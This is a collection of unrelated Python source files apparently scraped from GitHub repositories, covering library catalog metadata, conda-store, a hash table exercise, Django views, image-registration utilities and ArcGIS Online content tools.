import subprocess as subproc
import datetime
import json
import urllib
import re
from urllib.request import urlopen
from collections import OrderedDict
#######################
###### ARGUMENTS ######
#######################
parser = argparse.ArgumentParser(
description ="Script to pull catalog metadata, remove holdings info (e.g. checkout status), end add processing metadata (e.g. date processed)")
parser.add_argument(
'-l', '--lib', type=str,
help='Library, for a list of library IDs, visit ufot.me/libs ',
required=True,
choices=['ARCH','ART','ASTRO','CHEM','CRIM',
'DENT','OPIRG','EARTH','EAL','ECSL','FCML',
'FNH','GERSTEIN','INFORUM','INNIS','KNOX',
'LAW','MDL','MATH','MC','PONTIF','MUSIC',
'NEWCOLLEGE','NEWMAN','OISE','PJRC','PHYSICS',
'REGIS','RCL','UTL','ROM','MPI','STMIKES',
'TFRBL','TRIN','UC','UTARMS','UTM','UTSC','VIC'])
parser.add_argument(
'-m', '--mediatype', type=str,
help='Use \"3.5\" or \"5.25\" or \"CD\" or \"USB\"',required=True,
choices=['3.5','5.25', 'CD', 'USB'])
parser.add_argument(
'-k', '--key', type=str,
help='catkey', required=False)
## Array for all args passed to script
args = parser.parse_args()
###############################
########## VARIABLES ##########
###############################
date = datetime.datetime.today().strftime('%Y-%m-%d') # sets today's date as the $date variable
lib = args.lib
mediaType = args.mediatype
catKey = args.key
####################################
############ FUNCTIONS #############
####################################
# Get json from a URL (we're going to use keyURL), read and decode the response and then put in ordered dictionary
def get_json_data(url):
response = urlopen(url)
data = response.read().decode()
return json.loads((data), object_pairs_hook=OrderedDict)
########################
##### THE GOODS ######
########################
### do a catalog call based on the catkey
catUrl = str("https://search.library.utoronto.ca/details?%s&format=json" % catKey) #set catalog search url based on catkey
# make a dictionary out of the response from catUrl
cat_dic = get_json_data(catUrl) #run get_json_data function using catUrl)
title = cat_dic['record']['title'] #set the $title variable based on record.title in json
imprint = cat_dic['record']['imprint'] #set the $imprint variable
catkey = cat_dic['record']['catkey'] #set the $catkey variable
description = cat_dic['record']['description'] #set the $description variable
## Create dictionary of capture data to add to json metadata
capture_dic = {
'disk':{
'CaptureDate': date,
'media': mediaType,
'library': lib}
}
## delete holdings info (e.g. checkout info) from cat_dic
del cat_dic['record']['holdings']
## add capture dictionary to cat_dic dictionary
cat_dic.update(capture_dic)
## dump resulting json to stdout/screen:
json.dump(cat_dic, sys.stdout, indent=4) ## outputs json dump of created dictionary to system sydout, indented, can pipe to file or screen
print() #line break
sys.exit (0) #exit
```
|
{
"source": "jess-x/conda-store",
"score": 2
}
|
#### File: conda_store_server/worker/app.py
```python
import logging
from traitlets import Unicode, Integer, List
from traitlets.config import Application
from conda_store_server.app import CondaStore
class CondaStoreWorker(Application):
aliases = {
"config": "CondaStoreWorker.config_file",
}
log_level = Integer(
logging.INFO,
help="log level to use",
config=True,
)
watch_paths = List(
[], help="list of paths to watch for environment changes", config=True
)
config_file = Unicode(
"conda_store_config.py", help="config file to load for conda-store", config=True
)
def initialize(self, *args, **kwargs):
super().initialize(*args, **kwargs)
self.load_config_file(self.config_file)
@property
def conda_store(self):
if hasattr(self, "_conda_store"):
return self._conda_store
self._conda_store = CondaStore(parent=self, log=self.log)
return self._conda_store
def start(self):
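        # Run an embedded celery worker (with beat) against the CondaStore
        # celery app; storage directories are created first.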
argv = [
"worker",
"--loglevel=INFO",
"--beat",
]
self.conda_store.ensure_directories()
self.conda_store.celery_app.worker_main(argv)
```
|
{
"source": "Jessy777-cripto/fundamentals-of-computational-issues",
"score": 3
}
|
#### File: fundamentals-of-computational-issues/hash-table/main.py
```python
def hashfunc_insert(k, i=0):
t = k%qtd_cont
if containers[t][i] == None:
containers[t][i] = k
    else: # if the slot is occupied, move on to the next slot in the bucket.
hashfunc_insert(k, i+1)
def hashfunc_search(k, i=1):
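    # record how many slots are probed until k (or an empty slot) is found;
    # i reaches tam_cont when the whole bucket has been scanned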
t = k%qtd_cont
if i == tam_cont:
return comp_key.append(i)
if containers[t][i-1] == k or containers[t][i-1] == None :
comp_key.append(i)
else:
hashfunc_search(k, i+1)
qtd_cont, tam_cont, qtd_in, *n = map(int, input().split(' '))
containers = [[None]*tam_cont for i in range (qtd_cont)]
comp_key = [] # number of comparisons made during each hash table search
in_data=[n[i] for i in range(qtd_in)] # keys to be inserted into the hash table
rest = n[qtd_in:] # keys to be searched for after the insertions
for d in range(len(in_data)): # insert the keys
hashfunc_insert(in_data[d])
for r in range(len(rest)): # search the hash table
hashfunc_search(rest[r])
for i in range(len(comp_key)):
print(comp_key[i], end=' ')
```
#### File: fundamentals-of-computational-issues/library/main.py
```python
class Livro:
codigo = None
nome = None
autor = None
__qtdeAlugueis = 0
def __init__(self, codigo, nome, autor):
self.codigo = codigo
self.nome = nome
self.autor = autor
def incrementaAluguel(self):
self.__qtdeAlugueis += 1
def getQtdeAlugueis(self):
return self.__qtdeAlugueis
class Biblioteca:
alugados = []
disponiveis = []
def inserir(self, livro):
self.disponiveis.append(livro)
def alugar(self, livro):
ok = True
mensagem = None
if livro in self.disponiveis:
for i in self.disponiveis:
if i == livro:
i.incrementaAluguel()
self.alugados.append(i)
self.disponiveis.remove(i)
break
elif livro in self.alugados:
ok = False
mensagem = "O livro ja esta alugado, infelizmente voce nao podera alugar"
else:
ok = False
mensagem = "O livro nao existe"
return (ok, mensagem)
def devolver(self, codLivro):
ok = True
mensagem = None
for livro in self.alugados:
if livro.codigo == codLivro:
self.disponiveis.append(livro)
self.alugados.remove(livro)
break
else:
ok = False
mensagem = "O livro nao esta alugado"
return (ok, mensagem)
def livroMaisAlugado(self):
ok = True
mensagem = None
maior = 0
nome = None
for livro in self.disponiveis:
if livro.getQtdeAlugueis() > maior:
maior = livro.getQtdeAlugueis()
nome = livro.nome
for livro in self.alugados:
if livro.getQtdeAlugueis() > maior:
maior = livro.getQtdeAlugueis()
nome = livro.nome
if maior == 0:
ok = False
mensagem = "Nenhum livro foi alugado ainda"
else:
mensagem = "O livro mais alugado e: %s (%d alugueis)"%(nome, maior)
return (ok, mensagem)
def livrosOrdenadosPeloNome(self):
listas = [self.disponiveis, self.alugados]
lista_geral = []
for l in listas:
troca = True
while troca:
p = len(l)-1
troca = False
for i in range(p):
if l[i].nome>l[i+1].nome:
l[i], l[i+1]= l[i+1], l[i]
troca = True
i= 0
j = 0
while True:
if i==len(self.disponiveis):
for n in range(self.alugados.index(self.alugados[j]), len(self.alugados)-self.alugados.index(self.alugados[j])):
print(self.alugados[n].codigo, end=' ')
lista_geral.append(self.alugados[n].codigo)
break
elif j == len(self.alugados):
for n in range(self.disponiveis.index(self.disponiveis[i]), len(self.disponiveis)-self.disponiveis.index(self.disponiveis[i])):
print(self.disponiveis[n].codigo, end=' ')
lista_geral.append(self.disponiveis[n].codigo)
break
            if self.disponiveis[i].nome < self.alugados[j].nome:
lista_geral.append(self.disponiveis[i].codigo)
i+=1
else:
lista_geral.append(self.alugados[j].codigo)
j+=1
class Main:
b = Biblioteca()
q_l, *v = input().split(',')
j = 0
for livro in range(int(q_l)):
lv = Livro(v[j], v[j+1], v[j+2])
b.inserir(lv)
j+=int(q_l)
b.livrosOrdenadosPeloNome()
```
|
{
"source": "je-ss-y/abaturanyi",
"score": 2
}
|
#### File: abaturanyi/ibiro/views.py
```python
from django.shortcuts import render, redirect
from django.http import HttpResponse
from .models import Location, Snap, Image, Profile  # Snap, Image and Profile are used below; assumed to be defined in models
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from .forms import ProfileForm,PostForm
# Create your views here.
@login_required(login_url='/accounts/login/')
def new_post(request):
current_user = request.user
if request.method == 'POST':
form = PostForm(request.POST, request.FILES)
if form.is_valid():
post = form.save(commit=False)
# post.user = current_user
post.save()
return redirect('postsToday')
else:
form = PostForm()
return render(request, 'all-posts/newpost.html', {"form": form})
@login_required(login_url='/accounts/login/')
def posts_of_day(request):
current_user = request.user
snap = Snap.objects.all()
return render(request, 'all-posts/poststoday.html', {"snap":snap})
@login_required(login_url='/accounts/login/')
def welcome(request):
location = Location.objects.all()
return render(request, 'all-posts/welcome.html',{"location":location})
def search_results(request):
if 'username' in request.GET and request.GET["username"]:
search_term = request.GET.get("username")
searched_users= Image.search_by_name(search_term)
message = f"{search_term}"
return render(request, 'all-posts/search.html',{"searched_users": searched_users})
else:
message = "You haven't searched for any term"
return render(request, 'all-posts/search.html',{"message":message})
@login_required(login_url='/accounts/login/')
def profile_form(request):
current_user = request.user
if request.method == 'POST':
form = ProfileForm(request.POST, request.FILES)
if form.is_valid():
profile = form.save(commit=False)
profile.user = current_user
profile.save()
return redirect('profile')
else:
form = ProfileForm()
return render(request, 'all-posts/profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def user_profile(request):
current_user = request.user
# snap = Snap.objects.filter(user=current_user)
profilepicture=Profile.objects.get(user=current_user)
return render(request, 'all-posts/profiledisplay.html', {"profilepicture": profilepicture})
```
|
{
"source": "jessychen1016/DPCN",
"score": 3
}
|
#### File: DPCN/data/data_utils.py
```python
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
import pandas as pd
from pandas import Series,DataFrame
import numpy as np
import torch
import os
import cv2
from PIL import Image
import matplotlib.pyplot as plt
import sys
import os
sys.path.append(os.path.abspath(".."))
from utils.utils import *
def default_loader(path, resize_shape, change_scale = False):
trans = transforms.Compose([
transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # imagenet
])
image = cv2.imread(path)
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
(h_original, w_original) = image.shape
image = cv2.resize(image, dsize=(resize_shape,resize_shape), interpolation=cv2.INTER_CUBIC)
angle = (np.random.rand()-0.5) * 0.
angle += 180.
angle %= 360
angle -= 180.
(h, w) = image.shape
(cX, cY) = (w//2, h//2)
t_x = np.random.rand() * 0.
t_y = np.random.rand() * 0.
translation = np.array((t_y, t_x))
# arr = arr[0,]
# rot = ndii.rotate(arr, angle)
# N = np.float32([[1,0,t_x],[0,1,t_y]])
# image = cv2.warpAffine(image, N, (w, h))
# M = cv2.getRotationMatrix2D((cX, cY), angle, 1.0)
# image = cv2.warpAffine(image, M, (w, h))
# image = cv2.resize(image, (h, w), interpolation=cv2.INTER_CUBIC)
np_image_data = np.asarray(image)
image_tensor = trans(np_image_data)
scaling_factor = 1
if change_scale:
center = torch.ones(1,2)
center[:, 0] = h // 2
center[:, 1] = w // 2
scaling_factor = torch.tensor(np.random.rand()*0.2+1)
angle_source = torch.ones(1) * 0.
scale_source = torch.ones(1) * scaling_factor
image_tensor = image_tensor.unsqueeze(0)
rot_mat = kornia.get_rotation_matrix2d(center, angle_source, scale_source)
image_tensor = kornia.warp_affine(image_tensor, rot_mat, dsize=(h, w))
image_tensor = image_tensor.squeeze(0)
# image = Image.open(path)
# image = image.convert("1")
# # image.show()
# image = image.resize((128,128))
# image_tensor = trans(image)
return image_tensor, angle, translation, scaling_factor, h_original, w_original
def get_gt_tensor(this_gt, size):
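    # build a one-hot (size x size) tensor whose hot row index encodes the
    # rotation angle mapped from (-180, 180] onto [0, size)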
this_gt = this_gt +180
gt_tensor_self = torch.zeros(size,size)
angle_convert = this_gt*size/360
angle_index = angle_convert//1 + (angle_convert%1+0.5)//1
if angle_index.long() == size:
angle_index = size-1
gt_tensor_self[angle_index,0] = 1
else:
gt_tensor_self[angle_index.long(),0] = 1
# print("angle_index", angle_index)
return gt_tensor_self
```
#### File: DPCN/data/simulation.py
```python
import cv2
import numpy as np
import random
try:
import scipy.ndimage.interpolation as ndii
except ImportError:
import ndimage.interpolation as ndii
import matplotlib.pyplot as plt
def generate_random_data(height, width, count):
x, y, gt, trans = zip(*[generate_img_and_rot_img(height, width) for i in range(0, count)])
X = np.asarray(x) * 255
X = X.repeat(1, axis=1).transpose([0, 2, 3, 1]).astype(np.uint8)
Y = np.asarray(y) * 100
Y = Y.repeat(1, axis=1).transpose([0, 2, 3, 1]).astype(np.uint8)
return X, Y, gt, trans
def generate_img_and_rot_img(height, width):
shape = (height, width)
triangle_location = get_random_location(*shape)
triangle_location1 = get_random_location(*shape)
triangle_location2 = get_random_location(*shape)
circle_location1 = get_random_location(*shape, zoom=0.7)
circle_location2 = get_random_location(*shape, zoom=0.5)
circle_location3 = get_random_location(*shape, zoom=0.9)
mesh_location = get_random_location(*shape)
square_location = get_random_location(*shape, zoom=0.8)
plus_location = get_random_location(*shape, zoom=1.2)
plus_location1 = get_random_location(*shape, zoom=1.2)
plus_location2 = get_random_location(*shape, zoom=1.2)
plus_location3 = get_random_location(*shape, zoom=1.2)
plus_location4 = get_random_location(*shape, zoom=1.2)
# Create input image
arr = np.zeros(shape, dtype=bool)
arr = add_triangle(arr, *triangle_location)
arr = add_triangle(arr, *triangle_location1)
arr = add_triangle(arr, *triangle_location2)
arr = add_circle(arr, *circle_location1)
arr = add_circle(arr, *circle_location2, fill=True)
arr = add_circle(arr, *circle_location3)
arr = add_mesh_square(arr, *mesh_location)
arr = add_filled_square(arr, *square_location)
arr = add_plus(arr, *plus_location)
arr = add_plus(arr, *plus_location1)
arr = add_plus(arr, *plus_location2)
arr = add_plus(arr, *plus_location3)
arr = np.reshape(arr, (1, height, width)).astype(np.float32)
angle = np.random.rand() * 180
t_x = (np.random.rand()-0.5) * 50.
t_y = (np.random.rand()-0.5) * 50.
trans = np.array((t_y, t_x))
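    # random rotation (degrees) and translation form the registration ground
    # truth; the translation warp is applied before the rotation below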
if angle < -180.0:
angle = angle + 360.0
elif angle > 180.0:
angle = angle - 360.0
# arr = arr[0,]
# rot = ndii.rotate(arr, angle)
(_, h, w) = arr.shape
(cX, cY) = (w//2, h//2)
rot = arr[0,]
N = np.float32([[1,0,t_x],[0,1,t_y]])
rot = cv2.warpAffine(rot, N, (w, h))
M = cv2.getRotationMatrix2D((cX, cY), angle, 1.0)
rot = cv2.warpAffine(rot, M, (w, h))
rot = cv2.resize(rot, (h, w), interpolation=cv2.INTER_CUBIC)
# for heterogeneous image, comment out if you want them to be homogeneous
rot = cv2.GaussianBlur(rot, (9,9), 13)
kernel = np.array([[-1,-1,-1],[-1,9,-1],[-1,-1,-1]])
rot = cv2.filter2D(rot, -1, kernel)
rot = rot[np.newaxis, :]
# for dynamic obstacles, comment out if you dont want any dynamic obstacles
# arr[0,] = add_plus(arr[0], *plus_location4)
# arr = np.reshape(arr, (1, height, width)).astype(np.float32)
return arr, rot, angle, trans
def add_square(arr, x, y, size):
s = int(size / 2)
arr[x-s,y-s:y+s] = True
arr[x+s,y-s:y+s] = True
arr[x-s:x+s,y-s] = True
arr[x-s:x+s,y+s] = True
return arr
def add_filled_square(arr, x, y, size):
s = int(size / 2)
xx, yy = np.mgrid[:arr.shape[0], :arr.shape[1]]
return np.logical_or(arr, logical_and([xx > x - s, xx < x + s, yy > y - s, yy < y + s]))
def logical_and(arrays):
new_array = np.ones(arrays[0].shape, dtype=bool)
for a in arrays:
new_array = np.logical_and(new_array, a)
return new_array
def add_mesh_square(arr, x, y, size):
s = int(size / 2)
xx, yy = np.mgrid[:arr.shape[0], :arr.shape[1]]
return np.logical_or(arr, logical_and([xx > x - s, xx < x + s, xx % 2 == 1, yy > y - s, yy < y + s, yy % 2 == 1]))
def add_triangle(arr, x, y, size):
s = int(size / 2)
triangle = np.tril(np.ones((size, size), dtype=bool))
arr[x-s:x-s+triangle.shape[0],y-s:y-s+triangle.shape[1]] = triangle
return arr
def add_circle(arr, x, y, size, fill=False):
xx, yy = np.mgrid[:arr.shape[0], :arr.shape[1]]
circle = np.sqrt((xx - x) ** 2 + (yy - y) ** 2)
new_arr = np.logical_or(arr, np.logical_and(circle < size, circle >= size * 0.7 if not fill else True))
return new_arr
def add_plus(arr, x, y, size):
s = int(size / 2)
arr[x-1:x+1,y-s:y+s] = True
arr[x-s:x+s,y-1:y+1] = True
return arr
def get_random_location(width, height, zoom=1.0):
x = int(width * random.uniform(0.22, 0.78))
y = int(height * random.uniform(0.22, 0.78))
size = int(min(width, height) * random.uniform(0.06, 0.12) * zoom)
return (x, y, size)
```
#### File: DPCN/log_polar/polar.py
```python
import tensorflow as tf  # assumed: the helpers below use TF ops but the import is missing from this excerpt
def get_pixel_value(img, x, y):
"""
Utility function to get pixel value for coordinate
vectors x and y from a 4D tensor image.
Input
-----
- img: tensor of shape (B, H, W, C)
- x: flattened tensor of shape (B*H*W,)
- y: flattened tensor of shape (B*H*W,)
Returns
-------
- output: tensor of shape (B, H, W, C)
"""
shape = tf.shape(x)
batch_size = shape[0]
height = shape[1]
width = shape[2]
batch_idx = tf.range(0, batch_size)
batch_idx = tf.reshape(batch_idx, (batch_size, 1, 1))
b = tf.tile(batch_idx, (1, height, width))
indices = tf.stack([b, y, x], 3)
return tf.gather_nd(img, indices)
def affine_grid_generator(height, width, theta):
"""
This function returns a sampling grid, which when
used with the bilinear sampler on the input feature
map, will create an output feature map that is an
affine transformation [1] of the input feature map.
Input
-----
- height: desired height of grid/output. Used
to downsample or upsample.
- width: desired width of grid/output. Used
to downsample or upsample.
- theta: affine transform matrices of shape (num_batch, 2, 3).
For each image in the batch, we have 6 theta parameters of
the form (2x3) that define the affine transformation T.
Returns
-------
- normalized grid (-1, 1) of shape (num_batch, 2, H, W).
The 2nd dimension has 2 components: (x, y) which are the
sampling points of the original image for each point in the
target image.
Note
----
[1]: the affine transformation allows cropping, translation,
and isotropic scaling.
"""
num_batch = tf.shape(theta)[0]
# create normalized 2D grid
x = tf.linspace(-1.0, 1.0, width)
y = tf.linspace(-1.0, 1.0, height)
x_t, y_t = tf.meshgrid(x, y)
# flatten
x_t_flat = tf.reshape(x_t, [-1])
y_t_flat = tf.reshape(y_t, [-1])
# reshape to [x_t, y_t , 1] - (homogeneous form)
ones = tf.ones_like(x_t_flat)
sampling_grid = tf.stack([x_t_flat, y_t_flat, ones])
# repeat grid num_batch times
sampling_grid = tf.expand_dims(sampling_grid, axis=0)
sampling_grid = tf.tile(sampling_grid, tf.stack([num_batch, 1, 1]))
# cast to float32 (required for matmul)
theta = tf.cast(theta, 'float32')
sampling_grid = tf.cast(sampling_grid, 'float32')
# transform the sampling grid - batch multiply
batch_grids = tf.matmul(theta, sampling_grid)
# batch grid has shape (num_batch, 2, H*W)
# reshape to (num_batch, H, W, 2)
batch_grids = tf.reshape(batch_grids, [num_batch, 2, height, width])
return batch_grids
def bilinear_sampler(img, x, y):
"""
Performs bilinear sampling of the input images according to the
normalized coordinates provided by the sampling grid. Note that
the sampling is done identically for each channel of the input.
To test if the function works properly, output image should be
identical to input image when theta is initialized to identity
transform.
Input
-----
- img: batch of images in (B, H, W, C) layout.
- grid: x, y which is the output of affine_grid_generator.
Returns
-------
- out: interpolated images according to grids. Same size as grid.
"""
H = tf.shape(img)[1]
W = tf.shape(img)[2]
max_y = tf.cast(H - 1, 'int32')
max_x = tf.cast(W - 1, 'int32')
zero = tf.zeros([], dtype='int32')
# rescale x and y to [0, W-1/H-1]
x = tf.cast(x, 'float32')
y = tf.cast(y, 'float32')
x = 0.5 * ((x + 1.0) * tf.cast(max_x-1, 'float32'))
y = 0.5 * ((y + 1.0) * tf.cast(max_y-1, 'float32'))
# grab 4 nearest corner points for each (x_i, y_i)
x0 = tf.cast(tf.floor(x), 'int32')
x1 = x0 + 1
y0 = tf.cast(tf.floor(y), 'int32')
y1 = y0 + 1
# clip to range [0, H-1/W-1] to not violate img boundaries
x0 = tf.clip_by_value(x0, zero, max_x)
x1 = tf.clip_by_value(x1, zero, max_x)
y0 = tf.clip_by_value(y0, zero, max_y)
y1 = tf.clip_by_value(y1, zero, max_y)
# get pixel value at corner coords
Ia = get_pixel_value(img, x0, y0)
Ib = get_pixel_value(img, x0, y1)
Ic = get_pixel_value(img, x1, y0)
Id = get_pixel_value(img, x1, y1)
# recast as float for delta calculation
x0 = tf.cast(x0, 'float32')
x1 = tf.cast(x1, 'float32')
y0 = tf.cast(y0, 'float32')
y1 = tf.cast(y1, 'float32')
# calculate deltas
wa = (x1-x) * (y1-y)
wb = (x1-x) * (y-y0)
wc = (x-x0) * (y1-y)
wd = (x-x0) * (y-y0)
# add dimension for addition
wa = tf.expand_dims(wa, axis=3)
wb = tf.expand_dims(wb, axis=3)
wc = tf.expand_dims(wc, axis=3)
wd = tf.expand_dims(wd, axis=3)
# compute output
out = tf.add_n([wa*Ia, wb*Ib, wc*Ic, wd*Id])
return out
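# Example sketch (assumed names and shapes): chaining the helpers above as a
# spatial transformer, as their docstrings describe.
# grids = affine_grid_generator(out_h, out_w, theta)   # theta: (B, 2, 3) affine matrices
# x_s, y_s = grids[:, 0, :, :], grids[:, 1, :, :]      # sampling coords, each (B, H, W)
# warped = bilinear_sampler(img_batch, x_s, y_s)       # img_batch: (B, H, W, C) float32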
# import torch
# import cv2
# import torch.nn.functional as F
# import matplotlib.pyplot as plt
# import numpy as np
# import torchvision.models as models
# import torchvision.transforms as transforms
# import torch.nn as nn
# import torch
# import matplotlib
# import matplotlib.pyplot as plt
# theta = torch.Tensor([[0.707,0.707,0],[-0.707,0.707,0]]).unsqueeze(dim=0)
# img = cv2.imread('1.jpg',cv2.IMREAD_GRAYSCALE)
# plt.subplot(2,1,1)
# plt.imshow(img,cmap='gray')
# plt.axis('off')
# img = torch.Tensor(img).unsqueeze(0).unsqueeze(0)
# grid = F.affine_grid(theta,size=img.shape)
# print(np.shape(grid))
# print(grid)
# new_img_PIL = transforms.ToPILImage()(grid).convert('RGB')
# new_img_PIL.show()
# output = F.grid_sample(img,grid)[0].numpy().transpose(1,2,0).squeeze()
# plt.subplot(2,1,2)
# plt.imshow(output,cmap='gray')
# plt.axis('off')
# plt.show()
```
|
{
"source": "jessyd72/AGO-slicer",
"score": 3
}
|
#### File: jessyd72/AGO-slicer/agol_slicer.py
```python
import arcgis
from arcgis.gis import GIS, User
import json
import tkinter as tk
import xlsxwriter
from xlsxwriter import Workbook
def createWorkbook(output_dir, un):
''' Creates Excel workbook with sheet of
AGOL content for a user. Intended to be used
to create a slicer.'''
workbook = Workbook(output_dir)
sheet = workbook.add_worksheet('AGO Items-{}'.format(un))
sheet.write('A1','WebApp')
sheet.write('B1','WebMap')
sheet.write('C1','Feature Layer')
sheet.write('D1','Feature Service')
sheet.write('E1', 'Folder')
return(workbook, sheet)
def getUserCreds():
'''Gets AGO/Portal creds'''
def getUserInput():
'''Reads inputs from Tk object'''
global outputs
outputs = [item.get() for item in user_input]
root.destroy()
user_input = []
root = tk.Tk()
root.title('AGOL Credentials')
root.geometry('400x400')
for x in range(4):
inputs = tk.Entry(root)
inputs.grid(row = x, column=1)
if x == 0:
inputs.insert(0, 'https://arcgis.com')
if x == 2:
inputs.config(show='*')
user_input.append(inputs)
button = tk.Button(root, text='OK', command=getUserInput)
button.grid(row=4, column=0, pady=20)
label_url = tk.Label(root, text='AGOL/Portal URL ')
label_url.grid(row=0, column=0, pady=20)
label_un = tk.Label(root, text='Username ')
label_un.grid(row=1, column=0, pady=20)
label_pw = tk.Label(root, text='Password ')
label_pw.grid(row=2, column=0, pady=20)
label_pw = tk.Label(root, text='Output Excel Workbook ')
label_pw.grid(row=3, column=0, pady=20)
root.mainloop()
return(outputs)
def getContent(user):
    '''Gets all items within a user's
    AGO. Returns a dictionary of items,
    Item ID : [Item Title, Item Type, Folder, Item object]'''
all_items = {}
# get users items (home)
for item in user.items():
if item.type != 'Code Attachment':
all_items[item.itemid] = [item.title, item.type, 'home', item]
folders = user.folders
for f in folders:
f_items = user.items(folder=f['title'])
for item in f_items:
if item.type != 'Code Attachment':
all_items[item.itemid] = [item.title, item.type, f['title'], item]
return(all_items)
def sortContent(items, content_types):
'''Sorts content into respective dictionaries
to write to Excel workbook in writeItems function.
Accesses any layers within a feature service.
maps, layers, tools, applications, datafiles'''
lyrs = {}
maps = {}
apps = {}
data = {}
tools = {}
for k, v in items.items():
item_id = k
item_title = v[0]
item_type = v[1]
item_loc = v[2]
item_obj = v[3]
item_cat = content_types[item_type]
if item_cat == 'layers':
layers = item_obj.layers
for l in layers:
service_url = (l.url).replace('ArcGIS', 'arcgis')
lyr_name = l.properties.name
# feature layer service url = [feature layer name, feature service id, feature service name, folder]
lyrs[service_url] = [lyr_name, item_id, item_title, item_loc]
if item_type == 'Map Service':
lyrs[item_obj.url] = [item_title, item_id, item_title, item_loc]
elif item_cat == 'maps':
op_lyrs = item_obj.get_data()['operationalLayers']
op_lyr_ids = [[l['title'], l['url'].replace('ArcGIS', 'arcgis')] for l in op_lyrs]
# web map id = [web map name, [feature layer name, feature layer service url]]
maps[item_id] = [item_title, op_lyr_ids, item_loc]
elif item_cat == 'applications':
# print(item_id)
            # print(item_title)
# print(item_type)
# print(item_loc)
map_in_app = ''
app_data = item_obj.get_data()
if 'map' in app_data.keys():
map_in_app = app_data['map']['itemId']
elif item_type == 'Dashboard' and 'widgets' in app_data.keys():
for d in app_data['widgets']:
if d['type'] == 'mapWidget':
map_in_app = d['itemId']
if map_in_app == '':
map_in_app = 'NA'
else:
map_in_app = 'NA'
# application name = [application id, web map id]
apps[item_title] = [item_id, map_in_app, item_loc]
elif item_cat == 'datafiles':
data[item_title] = [item_id, item_loc]
elif item_cat == 'tools':
tools[item_title] = [item_id, item_loc]
else:
continue
return(apps, maps, lyrs, data)
def writeItems(workbook, sheet, apps, maps, layers, data):
    '''Writes the application / web map / layer relationships to the Excel sheet.
    Input dictionary shapes:
    feature layer service url = [feature layer name, feature service id, feature service name, folder]
    web map id = [web map name, [feature layer name, feature layer service url]]
    application name = [application id, web map id]'''
used_webmap = []
used_layers = []
row = 1
for k, v in apps.items():
app_name = k
map_id = v[1]
if map_id == 'NA':
row += 1
sheet.write('A{}'.format(str(row)), app_name)
else:
map_title = maps[map_id][0]
layer_list = maps[map_id][1]
for lyr in layer_list:
layer_name = lyr[0]
layer_url = lyr[1]
feature_service_name = layers[layer_url][2]
row += 1
sheet.write('A{}'.format(str(row)), app_name)
sheet.write('B{}'.format(str(row)), map_title)
sheet.write('C{}'.format(str(row)), layer_name)
sheet.write('D{}'.format(str(row)), feature_service_name)
used_webmap.append(map_id)
used_layers.append(layer_url)
unused_webmaps = list(set(maps.keys()) - set(used_webmap))
for wm in unused_webmaps:
map_title = maps[wm][0]
layer_list = maps[wm][1]
for lyr in layer_list:
layer_name = lyr[0]
layer_url = lyr[1]
feature_service_name = layers[layer_url][2]
row += 1
sheet.write('B{}'.format(str(row)), map_title)
sheet.write('C{}'.format(str(row)), layer_name)
sheet.write('D{}'.format(str(row)), feature_service_name)
used_layers.append(layer_url)
unused_layers = list(set(layers.keys()) - set(used_layers))
for l in unused_layers:
layer_name = layers[l][0]
feature_service_name = layers[l][2]
row += 1
sheet.write('C{}'.format(str(row)), layer_name)
sheet.write('D{}'.format(str(row)), feature_service_name)
workbook.close()
if __name__ == '__main__':
try:
# AGOL item types
print('loading dictionary...')
txt = open(r"C:\data\gtg-data\projects\_agol-slicer\AGO_items_by_group.json").read()
item_types = json.loads(txt)
print('getting credentials...')
creds = getUserCreds()
url = creds[0]
un = creds[1]
pw = creds[2]
out_xlsx = creds[3]
print('accessing AGO...')
gis = GIS(url, un, pw)
user = User(gis, un)
## future ref- can use gis.users.search() to get list
## of all users in org. Loop all users through the
## getContent funct to get whole org's content.
## consider new tab/df for each user
        print("getting user's content...")
item_dict = getContent(user)
print('organizing content by type...')
apps, maps, lyrs, data = sortContent(item_dict, item_types)
print('creating XLSX...')
wb, sh = createWorkbook(out_xlsx, un)
print('writing to XLSX...')
writeItems(wb, sh, apps, maps, lyrs, data)
except KeyError as e:
print(e)
print(lyrs)
print(maps)
print(apps)
```
|
{
"source": "jessyd72/batchjob-data-reviewer",
"score": 2
}
|
#### File: jessyd72/batchjob-data-reviewer/autoBatchJob-DataReview.py
```python
import arcpy
from arcpy import env
from arcpy.sa import *
import os
arcpy.CheckOutExtension("datareviewer")
# ------------------------------------------------------------------------------------------------------------------------
## Run data reviewer for database
# ------------------------------------------------------------------------------------------------------------------------
def runDataReview(workspace, spatRef, sessionName, polyRBJ, lineRBJ, pointRBJ, featureList, prodWorkspace):
# enable Data Reviewer in workspace
arcpy.EnableDataReviewer_Reviewer(workspace, spatRef)
# start reviewer session
session = arcpy.CreateReviewerSession_Reviewer(workspace, sessionName)
# grab geodatabase name from prodWorkspace
wDesc = arcpy.Describe(prodWorkspace)
gdbName, gdbExt = os.path.splitext(str(wDesc.name))
    # Loop through provided feature classes and run the appropriate batch job check
for feature in featureList.split(';'):
feature = feature.strip("'")
# describe feature to get shape type
featDesc = arcpy.Describe(feature)
# assign correct batch job check to var RBJfile based on geometry
if featDesc.shapeType == 'Polygon':
RBJfile = polyRBJ
elif featDesc.shapeType == 'Polyline':
RBJfile = lineRBJ
elif featDesc.shapeType == 'Point':
RBJfile = pointRBJ
else:
arcpy.AddMessage("Check %s shape type" % feature)
# get directory to RBJ file
dirRBJ = os.path.dirname(RBJfile)
# open read version of RBJfile as string
s = open(RBJfile).read()
# replace text with parameters
s1 = s.replace('FEATURE', featDesc.name)
s2 = s1.replace('GDBpath', prodWorkspace)
s3 = s2.replace('GDBname', gdbName)
# open new file to copy into
newBatchFile = open(dirRBJ + r"\%sBatchJob.RBJ" % featDesc.name, 'w')
# copy code over
newBatchFile.write(s3)
newBatchFile.close()
# get new batch job file path name
batchFilePath = dirRBJ + r"\%sBatchJob.RBJ" % featDesc.name
# run data reviewer
arcpy.AddMessage("Running %s check on %s" % (featDesc.shapeType, featDesc.name))
rev = arcpy.ExecuteReviewerBatchJob_Reviewer(workspace, session, batchFilePath, prodWorkspace)
# delete new batch file
os.remove(batchFilePath)
if __name__ == "__main__":
# inputs
workspace = arcpy.GetParameterAsText(0)
spatRef = arcpy.GetParameterAsText(1)
sessionName = arcpy.GetParameterAsText(2)
polyRBJ = arcpy.GetParameterAsText(3)
lineRBJ = arcpy.GetParameterAsText(4)
